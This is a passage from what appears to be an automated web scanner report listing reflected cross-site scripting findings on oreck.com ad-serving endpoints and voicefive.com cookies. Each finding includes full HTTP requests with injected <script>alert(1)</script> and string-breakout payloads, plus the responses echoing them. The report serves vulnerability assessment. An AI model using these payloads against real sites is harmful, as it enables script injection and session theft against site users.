Set-Cookie: CSList=1088660/1113699,1088660/1113699,1088660/1113699,1088660/1113699,1088660/1113699; expires=Fri, 16 Dec 2011 13:06:34 GMT; path=/; domain=.oreck.com
x_transtrans: 14.6.10.688
Content-Type: text/html
Content-Length: 5520
Connection: close


<SCRIPT LANGUAGE="JavaScript">

function Measure_this(EV)
{
var img = new Image();
img.src = "http://webmedia.oreck.com/image_htmlping?spacedesc=2112034_1113699_180x150_2037848_2112034&af=1119611
...[SNIP]...
34&af=1119611&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2112034&ml_camp=1088660&ml_crid=2142475&click=http://clk.atdmt.com/go/msnnkdrv0010001658apm/direct;wi.180;hi.150;01;ai.234564869.234602079;ct.1/01?href=&e741d"><script>alert(1)</script>b7e5f4284bb=1http://www.oreck.com/Oreck-Graphite-Vacuum-Cleaner?keycode=DS544&ban=Graphite&cstruid=1088660_1113699_2037848_2112034_1119611_2142475">
...[SNIP]...

5.68. http://webmedia.oreck.com/cookE/geoip/iframe [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://webmedia.oreck.com
Path:   /cookE/geoip/iframe

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e011d'-alert(1)-'816dd40d976 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cookE/geoip/iframe?spacedesc=2112034_1113699_180x150_2037848_2112034&target=_blank&@CPSC@=http://clk.atdmt.com/go/msnnkdrv0010001658apm/direct;wi.180;hi.150;01;ai.234564869.234602079;ct.1/01?href=&e011d'-alert(1)-'816dd40d976=1 HTTP/1.1
Host: webmedia.oreck.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=CP49AO&cb=404881879
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 13:06:35 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://webmedia.oreck.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=11-676885560; expires=Tue, 17 Sep 2013 01:06:35 GMT; path=/; domain=.oreck.com
Set-Cookie: CSList=1088660/1113699,1088660/1113699,1088660/1113699,1088660/1113699,1088660/1113699; expires=Fri, 16 Dec 2011 13:06:35 GMT; path=/; domain=.oreck.com
x_transtrans: .6.10.688
Content-Type: text/html
Content-Length: 5445
Connection: close


<SCRIPT LANGUAGE="JavaScript">

function Measure_this(EV)
{
var img = new Image();
img.src = "http://webmedia.oreck.com/image_htmlping?spacedesc=2112034_1113699_180x150_2037848_2112034&af=1119611
...[SNIP]...
%253A%2522%2522&ml_pbi=-2112034&ml_camp=1088660&ml_crid=2142475&ml_multiclick=clickTAG1&click=http://clk.atdmt.com/go/msnnkdrv0010001658apm/direct;wi.180;hi.150;01;ai.234564869.234602079;ct.1/01?href=&e011d'-alert(1)-'816dd40d976=1http://www.oreck.com/Oreck-Graphite-Vacuum-Cleaner?keycode=DS544&ban=Graphite&cstruid=1088660_1113699_2037848_2112034_1119611_2142475')
+ '&clickTAG2=' + escape('http://webmedia.oreck.com/click.ng?s
...[SNIP]...

5.69. http://webmedia.oreck.com/cookE/geoip/iframe [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://webmedia.oreck.com
Path:   /cookE/geoip/iframe

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ccbb"><script>alert(1)</script>88c8787917c was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cookE/geoip/iframe?spacedesc=2112034_1113699_180x150_2037848_2112034&target=_blank1ccbb"><script>alert(1)</script>88c8787917c&@CPSC@=http://clk.atdmt.com/go/msnnkdrv0010001658apm/direct;wi.180;hi.150;01;ai.234564869.234602079;ct.1/01?href= HTTP/1.1
Host: webmedia.oreck.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=CP49AO&cb=404881879
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 13:06:33 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://webmedia.oreck.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=11-676885560; expires=Tue, 17 Sep 2013 01:06:33 GMT; path=/; domain=.oreck.com
Set-Cookie: CSList=1088660/1113699,1088660/1113699,1088660/1113699,1088660/1113699,1088660/1113699; expires=Fri, 16 Dec 2011 13:06:33 GMT; path=/; domain=.oreck.com
x_transtrans: 10.6.10.688
Content-Type: text/html
Content-Length: 5419
Connection: close


<SCRIPT LANGUAGE="JavaScript">

function Measure_this(EV)
{
var img = new Image();
img.src = "http://webmedia.oreck.com/image_htmlping?spacedesc=2112034_1113699_180x150_2037848_2112034&af=1119611
...[SNIP]...
<A TARGET="_blank1ccbb"><script>alert(1)</script>88c8787917c" HREF="http://webmedia.oreck.com/click.ng?spacedesc=2112034_1113699_180x150_2037848_2112034&af=1119611&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2112034&ml_camp=1088660&ml_crid=2142475&click=http://clk.atdmt.
...[SNIP]...

5.70. http://webmedia.oreck.com/cookE/geoip/iframe [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://webmedia.oreck.com
Path:   /cookE/geoip/iframe

Issue detail

The value of the target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89b81'%3balert(1)//614f7906e54 was submitted in the target parameter. This input was echoed as 89b81';alert(1)//614f7906e54 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cookE/geoip/iframe?spacedesc=2112034_1113699_180x150_2037848_2112034&target=_blank89b81'%3balert(1)//614f7906e54&@CPSC@=http://clk.atdmt.com/go/msnnkdrv0010001658apm/direct;wi.180;hi.150;01;ai.234564869.234602079;ct.1/01?href= HTTP/1.1
Host: webmedia.oreck.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=CP49AO&cb=404881879
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 13:06:33 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://webmedia.oreck.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=11-676885560; expires=Tue, 17 Sep 2013 01:06:33 GMT; path=/; domain=.oreck.com
Set-Cookie: CSList=1088660/1113699,1088660/1113699,1088660/1113699,1088660/1113699,1088660/1113699; expires=Fri, 16 Dec 2011 13:06:33 GMT; path=/; domain=.oreck.com
x_transtrans: 14.6.10.688
Content-Type: text/html
Content-Length: 5374
Connection: close


<SCRIPT LANGUAGE="JavaScript">

function Measure_this(EV)
{
var img = new Image();
img.src = "http://webmedia.oreck.com/image_htmlping?spacedesc=2112034_1113699_180x150_2037848_2112034&af=1119611
...[SNIP]...
OD/18369/creatives/Graphite_180x150.dir/graphite_180x150.swf';
var flash_name= '"' + swf_name + '"';
var swfVer= 100/10;
var swfMime= 'application/x-shockwave-flash';
var clickTAGs= 'clickTARGET=_blank89b81';alert(1)//614f7906e54' + '&clickTAG1=' + escape('http://webmedia.oreck.com/click.ng?spacedesc=2112034_1113699_180x150_2037848_2112034&af=1119611&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2112034&ml_camp=1088660&ml_crid=2142475&ml_
...[SNIP]...

5.71. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload 47239<script>alert(1)</script>3fda164fbc8 was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p108883753&PRAd=65659550&AR_C=42804711 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N763.MicrosoftMediaNetwork/B5634534.12;sz=728x90;;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/107000000000056488.1?!&&PID=8798816&UIT=G-&TargetID=52980966&AN=169413070&PG=DLSRD1&ASID=d97db84998f14df1adc268fef31dc64c&destination=;ord=169413070?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; BMX_BR=pid=p109848095&prad=70982068&arc=43901049&exp=1316221073; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=1&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:03:59 2011&prad=65659550&arc=42804711&; BMX_3PC=147239<script>alert(1)</script>3fda164fbc8; UID=9cc29993-80.67.74.150-1314836282; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1316264640%2E321%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 14:04:51 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p108883753=exp=4&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 14:04:51 2011&8f90f<script>alert(1)</script>d84fff57e96=&prad=65659550&arc=42804711&; expires=Fri 16-Dec-2011 14:04:51 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 30574

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"65659550",Pid:"p108883753",Arc:"42804711",Location:C
...[SNIP]...
MX_G]]>>": 'method%2D%3E%2D1%2Cts%2D%3E1316264640%2E321%2Cwait%2D%3E10000%2C', ">": 'exp=1&initExp=Sat Sep 17 13:09:12 2011&recExp=Sat Sep 17 13:09:12 2011&prad=65659550&arc=42804711&', "BMX_3PC": '147239<script>alert(1)</script>3fda164fbc8', "sn": 'exp=5&initExp=Sat Sep 17 13:09:11 2011&recExp=Sat Sep 17 13:09:12 2011&prad=65659550&arc=42804711&', "BMX_BR": 'pid=p109848095&prad=70982068&arc=43901049&exp=1316221073', "ar_8a7a0
774a29
...[SNIP]...

5.72. http://ar.voicefive.com/bmx3/broker.pli [BMX_BR cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the BMX_BR cookie is copied into the HTML document as plain text between tags. The payload d388f<script>alert(1)</script>a202127003c was submitted in the BMX_BR cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p108883753&PRAd=65659550&AR_C=42804711 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N763.MicrosoftMediaNetwork/B5634534.12;sz=728x90;;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/107000000000056488.1?!&&PID=8798816&UIT=G-&TargetID=52980966&AN=1376324361&PG=DLSRR1&ASID=d3af6362ac6e4a25944cc785a16bf745&destination=;ord=1376324361?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; BMX_BR=pid=p109848095&prad=70982068&arc=43901049&exp=1316221073d388f<script>alert(1)</script>a202127003c; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; UID=9cc29993-80.67.74.150-1314836282

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 13:09:26 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p108883753=exp=111&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:09:26 2011&89dd4824e76d962d053637de=1&prad=65659550&arc=42804711&; expires=Fri 16-Dec-2011 13:09:26 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 29438

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"65659550",Pid:"p108883753",Arc:"42804711",Location:C
...[SNIP]...
711&', "BMX_3PC": '1', "sn": 'exp=5&initExp=Sat Sep 17 13:09:11 2011&recExp=Sat Sep 17 13:09:12 2011&prad=65659550&arc=42804711&', "BMX_BR": 'pid=p109848095&prad=70982068&arc=43901049&exp=1316221073d388f<script>alert(1)</script>a202127003c', "ar_8a7a0
774a29ac478": 'exp=1&initExp=Sat Sep 17 13:09:10 2011&recExp=Sat Sep 17 13:09:10 2011&prad=65659550&arc=42804711&', "ar_p108883753'": 'exp=1&initExp=Sat Sep 17 13:09:11 2011&recExp=Sat
...[SNIP]...

5.73. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the BMX_G cookie is copied into the HTML document as plain text between tags. The payload 1791d<script>alert(1)</script>6e2ddd05fd was submitted in the BMX_G cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p108883753&PRAd=65659550&AR_C=42804711 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N763.MicrosoftMediaNetwork/B5634534.12;sz=728x90;;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/107000000000056488.1?!&&PID=8798816&UIT=G-&TargetID=52980966&AN=169413070&PG=DLSRD1&ASID=d97db84998f14df1adc268fef31dc64c&destination=;ord=169413070?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; BMX_BR=pid=p109848095&prad=70982068&arc=43901049&exp=1316221073; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=1&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:03:59 2011&prad=65659550&arc=42804711&; BMX_3PC=1; UID=9cc29993-80.67.74.150-1314836282; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1316264640%2E321%2Cwait%2D%3E10000%2C1791d<script>alert(1)</script>6e2ddd05fd

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 14:04:52 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p108883753=exp=8&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 14:04:52 2011&8f90f<script>alert(1)</script>d84fff57e96=&prad=65659550&arc=42804711&; expires=Fri 16-Dec-2011 14:04:52 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 30573

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"65659550",Pid:"p108883753",Arc:"42804711",Location:C
...[SNIP]...
C', "ar_p110620504": 'exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1316264640%2E321%2Cwait%2D%3E10000%2C1791d<script>alert(1)</script>6e2ddd05fd', "ar_p109848095": 'exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&', "89dd48246a33298449bdf87": 'method%2D%3E%2D1%2Cts%2D%3E1316267468%2E354%2Cwai
...[SNIP]...

5.74. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the UID cookie is copied into the HTML document as plain text between tags. The payload fff61<script>alert(1)</script>4c70c1be1d was submitted in the UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p108883753&PRAd=65659550&AR_C=42804711 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N763.MicrosoftMediaNetwork/B5634534.12;sz=728x90;;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/107000000000056488.1?!&&PID=8798816&UIT=G-&TargetID=52980966&AN=1376324361&PG=DLSRR1&ASID=d3af6362ac6e4a25944cc785a16bf745&destination=;ord=1376324361?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; BMX_BR=pid=p109848095&prad=70982068&arc=43901049&exp=1316221073; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; UID=9cc29993-80.67.74.150-1314836282fff61<script>alert(1)</script>4c70c1be1d

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 13:09:29 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p108883753=exp=125&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:09:29 2011&89dd4824e76d962d053637de=1&prad=65659550&arc=42804711&; expires=Fri 16-Dec-2011 13:09:29 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 29433

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"65659550",Pid:"p108883753",Arc:"42804711",Location:C
...[SNIP]...
011&prad=70982068&arc=43901049&', "ar_p90175839": 'exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&', "UID": '9cc29993-80.67.74.150-1314836282fff61<script>alert(1)</script>4c70c1be1d', ">
...[SNIP]...

5.75. http://ar.voicefive.com/bmx3/broker.pli [ar_p107223597 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p107223597 cookie is copied into the HTML document as plain text between tags. The payload d1b6c<script>alert(1)</script>da4afe07d09 was submitted in the ar_p107223597 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p108883753&PRAd=65659550&AR_C=42804470 HTTP/1.1
Host: ar.voicefive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N763.MicrosoftMediaNetwork/B5634534.12;sz=728x90;;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/107000000000056488.1?!&&PID=8798816&UIT=A-&TargetID=52980966&AN=2048918403&PG=DLSRD1&ASID=d09c46b378244924a80762d176989e26&destination=;ord=2048918403?
Cookie: ar_p97174789=exp=1&initExp=Mon Aug 8 01:43:12 2011&recExp=Mon Aug 8 01:43:12 2011&prad=314453501&arc=210323079&; UID=187a66e5-80.67.74.153-1312767792; ar_p91143664=exp=24&initExp=Wed Aug 17 18:11:34 2011&recExp=Wed Aug 17 18:13:16 2011&468db16b9200b4026215b7a4=1&prad=309847789&arc=218676900&; ar_p107223597=exp=1&initExp=Thu Sep 1 03:23:36 2011&recExp=Thu Sep 1 03:23:36 2011&prad=74127&arc=452367&d1b6c<script>alert(1)</script>da4afe07d09; ar_p82806590=exp=1&initExp=Sun Sep 4 14:46:33 2011&recExp=Sun Sep 4 14:46:33 2011&prad=58779256&arc=43578905&; ar_p91136705=exp=1&initExp=Sun Sep 11 12:27:33 2011&recExp=Sun Sep 11 12:27:33 2011&prad=309650252&arc=206710286&

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 14:44:21 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p108883753=exp=205&initExp=Sat Sep 17 14:34:51 2011&recExp=Sat Sep 17 14:44:21 2011&89dd48247dd5113d6472e752=1&prad=65659550&arc=42804470&; expires=Fri 16-Dec-2011 14:44:21 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 34267

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"65659550",Pid:"p108883753",Arc:"42804470",Location:C
...[SNIP]...
